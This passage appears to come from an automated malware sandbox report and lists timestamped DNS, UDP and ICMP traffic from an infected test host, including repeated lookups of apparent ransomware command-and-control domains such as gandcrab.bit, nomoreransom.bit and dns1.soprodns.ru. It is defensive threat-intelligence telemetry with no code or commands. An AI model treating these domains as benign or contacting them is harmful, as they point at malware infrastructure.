Aug 31, 2022 23:50:34.796749115 CEST	53	64796	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.805094957 CEST	64797	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.824281931 CEST	53	64797	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.824858904 CEST	64798	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.844573975 CEST	53	64798	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.845123053 CEST	64799	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.864664078 CEST	53	64799	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.865340948 CEST	64800	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.884864092 CEST	53	64800	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.885485888 CEST	64801	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.902848959 CEST	53	64801	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:35.258631945 CEST	62537	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:35.827125072 CEST	53	62537	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:35.837460995 CEST	62538	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:35.856575966 CEST	53	62538	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:35.857431889 CEST	62539	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:35.876837969 CEST	53	62539	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:35.877444029 CEST	62540	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:35.900613070 CEST	53	62540	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:35.901067972 CEST	62541	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:35.921055079 CEST	53	62541	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:35.921513081 CEST	62542	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:35.941112041 CEST	53	62542	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:36.269373894 CEST	62036	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:37.255727053 CEST	62036	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:37.934292078 CEST	53	62036	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:37.942585945 CEST	62037	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:37.961843967 CEST	53	62037	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:37.962894917 CEST	62038	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:37.980525970 CEST	53	62038	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:37.987566948 CEST	62039	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:38.007184982 CEST	53	62039	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:38.007802010 CEST	62040	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:38.027669907 CEST	53	62040	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:38.028307915 CEST	62041	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:38.047924995 CEST	53	62041	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:38.376159906 CEST	63670	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:38.412417889 CEST	53	63670	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:38.419980049 CEST	63671	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:38.439403057 CEST	53	63671	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:38.440018892 CEST	63672	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:38.459865093 CEST	53	63672	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:38.460458040 CEST	63673	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:38.480101109 CEST	53	63673	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:38.481064081 CEST	63674	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:38.500571966 CEST	53	63674	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:38.501185894 CEST	63675	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:38.520761013 CEST	53	63675	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:38.925039053 CEST	61170	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:39.927758932 CEST	61170	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:39.928921938 CEST	53	62036	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:40.927438021 CEST	61170	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:41.055721998 CEST	53	61170	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:41.064487934 CEST	61171	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:41.081710100 CEST	53	61171	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:41.082365990 CEST	61172	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:41.102299929 CEST	53	61172	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:41.105315924 CEST	61173	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:41.125132084 CEST	53	61173	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:41.125727892 CEST	61174	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:41.145561934 CEST	53	61174	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:41.147699118 CEST	61175	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:41.165729046 CEST	53	61175	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:41.342947960 CEST	56427	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:41.456968069 CEST	53	61170	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:41.553389072 CEST	53	61170	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:41.981617928 CEST	53	56427	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:41.993149042 CEST	56428	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.012507915 CEST	53	56428	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.013339043 CEST	56429	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.033417940 CEST	53	56429	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.033911943 CEST	56430	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.053452969 CEST	53	56430	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.053870916 CEST	56431	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.071616888 CEST	53	56431	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.072022915 CEST	56432	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.091794014 CEST	53	56432	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.260376930 CEST	56431	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.379776001 CEST	53	56431	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.387754917 CEST	56432	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.407059908 CEST	53	56432	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.407532930 CEST	56433	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.427475929 CEST	53	56433	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.427927971 CEST	56434	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.447566032 CEST	53	56434	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.448009014 CEST	56435	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.465789080 CEST	53	56435	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.466213942 CEST	56436	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:42.486059904 CEST	53	56436	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:42.652055025 CEST	49465	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:43.646301031 CEST	49465	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:44.269579887 CEST	53	49465	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:44.278618097 CEST	49466	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:44.298013926 CEST	53	49466	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:44.300592899 CEST	49467	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:44.318439007 CEST	53	49467	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:44.319184065 CEST	49468	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:44.338943958 CEST	53	49468	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:44.340126038 CEST	49469	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:44.359947920 CEST	53	49469	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:44.362253904 CEST	49470	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:44.382220984 CEST	53	49470	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:44.560638905 CEST	54879	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:44.722793102 CEST	53	49465	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:45.552563906 CEST	54879	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:45.619430065 CEST	53	54879	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:45.626281023 CEST	54880	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:45.643874884 CEST	53	54880	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:45.644561052 CEST	54881	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:45.662398100 CEST	53	54881	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:45.662904024 CEST	54882	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:45.680767059 CEST	53	54882	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:45.681351900 CEST	54883	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:45.682105064 CEST	53	54879	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:45.701210022 CEST	53	54883	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:45.706056118 CEST	54884	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:45.725753069 CEST	53	54884	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:45.906866074 CEST	54296	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:46.913412094 CEST	54296	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:46.946067095 CEST	53	54296	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:46.955739975 CEST	54297	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:46.975125074 CEST	53	54297	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:46.975692987 CEST	54298	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:46.995784998 CEST	53	54298	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:46.996273041 CEST	54299	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:47.015886068 CEST	53	54299	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:47.016427994 CEST	54300	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:47.036571026 CEST	53	54300	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:47.037036896 CEST	54301	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:47.056572914 CEST	53	54301	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:48.583686113 CEST	53	54296	8.8.8.8	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 31, 2022 23:48:49.265063047 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:48:50.136071920 CEST	192.168.2.6	8.8.8.8	cff6	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:48:53.708611012 CEST	192.168.2.6	8.8.8.8	cff6	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:48:59.563985109 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:01.369291067 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:06.744471073 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:08.824440002 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:14.049535036 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:16.309123039 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:19.966995955 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:34.841367006 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:37.805382967 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:39.578983068 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:43.727289915 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:47.143408060 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:48.948611975 CEST	192.168.2.6	8.8.8.8	cff6	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:50.028990030 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:52.308603048 CEST	192.168.2.6	8.8.8.8	cff6	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:59.514467001 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:01.168688059 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:03.789285898 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:07.172538996 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:08.879571915 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:17.562561989 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:19.722575903 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:22.894917011 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:26.317929983 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:34.743129969 CEST	192.168.2.6	8.8.8.8	cff6	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:39.932499886 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:41.457130909 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:44.722973108 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:45.682204962 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:48.583869934 CEST	192.168.2.6	8.8.8.8	d033	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 31, 2022 23:48:44.116539001 CEST	192.168.2.6	8.8.8.8	0x77b2	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:45.117125034 CEST	192.168.2.6	8.8.8.8	0x79e2	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:46.120923042 CEST	192.168.2.6	8.8.8.8	0x79e2	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:47.148174047 CEST	192.168.2.6	8.8.8.8	0x79e2	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:47.446198940 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:47.468455076 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:47.488892078 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:48:47.509377956 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:47.529671907 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:48:48.691446066 CEST	192.168.2.6	8.8.8.8	0xa153	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:49.961707115 CEST	192.168.2.6	8.8.8.8	0xa153	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:50.144049883 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:50.163892984 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:50.247066021 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:48:50.267487049 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:50.285778999 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:48:54.912518978 CEST	192.168.2.6	8.8.8.8	0x507e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:54.986932039 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:55.006742954 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:55.025305033 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:48:55.046077967 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:55.066318035 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:48:56.292723894 CEST	192.168.2.6	8.8.8.8	0x37a1	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:57.294055939 CEST	192.168.2.6	8.8.8.8	0x37a1	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:57.923278093 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:57.941241026 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:57.961649895 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:48:57.979980946 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:58.002645016 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:48:59.203073978 CEST	192.168.2.6	8.8.8.8	0x327f	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:00.248944044 CEST	192.168.2.6	8.8.8.8	0x327f	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:00.827044010 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:00.850075960 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:00.891035080 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:00.911463022 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:00.931788921 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:02.198327065 CEST	192.168.2.6	8.8.8.8	0x799	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:02.264911890 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:02.284759998 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:02.302880049 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:02.321191072 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:02.339569092 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:03.829682112 CEST	192.168.2.6	8.8.8.8	0xebfc	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:03.922105074 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:03.940196037 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:03.959032059 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:03.979773998 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:04.012398005 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:05.030595064 CEST	192.168.2.6	8.8.8.8	0x3312	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:06.028855085 CEST	192.168.2.6	8.8.8.8	0x3312	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:06.098314047 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:06.118498087 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:06.139177084 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:06.157622099 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:06.177939892 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:07.180340052 CEST	192.168.2.6	8.8.8.8	0x2ef	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.172979116 CEST	192.168.2.6	8.8.8.8	0x2ef	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.337205887 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:08.357395887 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.378525019 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:08.399945974 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.420766115 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:11.635112047 CEST	192.168.2.6	8.8.8.8	0x9ae2	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:12.929991007 CEST	192.168.2.6	8.8.8.8	0x9ae2	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:13.344588995 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:13.365736008 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:13.387386084 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:13.407922029 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:13.428276062 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:14.604439974 CEST	192.168.2.6	8.8.8.8	0xf69c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:15.610282898 CEST	192.168.2.6	8.8.8.8	0xf69c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:15.762787104 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:15.787075996 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:15.820662022 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:15.846000910 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:15.872216940 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:17.166126013 CEST	192.168.2.6	8.8.8.8	0xaba4	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:17.297399998 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:17.315310955 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:17.336642981 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:17.355597019 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:17.376161098 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:18.439655066 CEST	192.168.2.6	8.8.8.8	0x3c13	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.436444044 CEST	192.168.2.6	8.8.8.8	0x3c13	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.605516911 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:19.625741959 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.646852970 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:19.667081118 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
